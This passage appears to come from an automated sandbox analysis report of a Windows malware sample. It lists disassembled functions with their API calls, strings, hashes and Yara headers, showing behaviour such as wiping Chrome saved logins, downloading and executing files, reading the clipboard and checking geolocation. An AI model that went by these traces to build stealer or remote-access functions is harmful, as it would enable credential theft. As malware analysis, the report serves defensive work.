                                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                              Strings
                                                              • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                              • String ID: http://geoplugin.net/json.gp
                                                              • API String ID: 3121278467-91888290
                                                              • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                              • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                              • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                              • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                              Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                              • GetLastError.KERNEL32 ref: 0040BA93
                                                              Strings
                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                              • UserProfile, xrefs: 0040BA59
                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                              • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                              • API String ID: 2018770650-1062637481
                                                              • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                              • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                              • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                              • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                              Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                              • GetLastError.KERNEL32 ref: 004179D8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 3534403312-3733053543
                                                              • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                              • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                              • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                              • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                              Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00409293
                                                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                              • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                                • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                                                • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                                              • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                              • String ID:
                                                              • API String ID: 1824512719-0
                                                              • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                              • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                              • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                              • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                              Function 00446270 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 464COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FSE$FSE$PkGNG
                                                              • API String ID: 0-1266307253
                                                              • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                              • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                              • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                              • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                              Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                              • String ID:
                                                              • API String ID: 276877138-0
                                                              • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                              • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                              • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                              • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                              Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                                                • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                                                • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                              • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                              • ExitProcess.KERNEL32 ref: 0040F905
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                              • String ID: 5.1.3 Pro$override$pth_unenc
                                                              • API String ID: 2281282204-1392497409
                                                              • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                              • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                              • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                              • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                              Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                              • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                              • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                              • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                              • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                              Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                              • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                              • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                              • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID: SETTINGS
                                                              • API String ID: 3473537107-594951305
                                                              • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                              • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                              • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                              • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                              Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004096A5
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                              • String ID:
                                                              • API String ID: 1157919129-0
                                                              • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                              • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                              • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                              • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                              Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0040884C
                                                              • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                              • String ID:
                                                              • API String ID: 1771804793-0
                                                              • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                              • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                              • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                              • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                              Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DownloadExecuteFileShell
                                                              • String ID: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$open
                                                              • API String ID: 2825088817-1584553696
                                                              • Opcode ID: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                              • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                              • Opcode Fuzzy Hash: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                              • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                              Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFind$FirstNextsend
                                                              • String ID: XPG$XPG
                                                              • API String ID: 4113138495-1962359302
                                                              • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                              • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                              • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                              • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                              Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                                • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                              • API String ID: 4127273184-3576401099
                                                              • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                              • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                              • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                              • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                              Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                              • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                              • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                              • String ID:
                                                              • API String ID: 4212172061-0
                                                              • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                              • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                              • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                              • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                              Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                              • String ID: p'E$JD
                                                              • API String ID: 1084509184-908320845
                                                              • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                              • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                              • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                              • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                              Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                              • String ID:
                                                              • API String ID: 2829624132-0
                                                              • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                              • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                              • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                              • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                              Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                              • String ID:
                                                              • API String ID: 1815803762-0
                                                              • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                              • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                              • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                              • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                              Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                              • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                              • CloseClipboard.USER32 ref: 0040B760
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$CloseDataOpen
                                                              • String ID:
                                                              • API String ID: 2058664381-0
                                                              • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                              • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                              • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                              • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                              Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
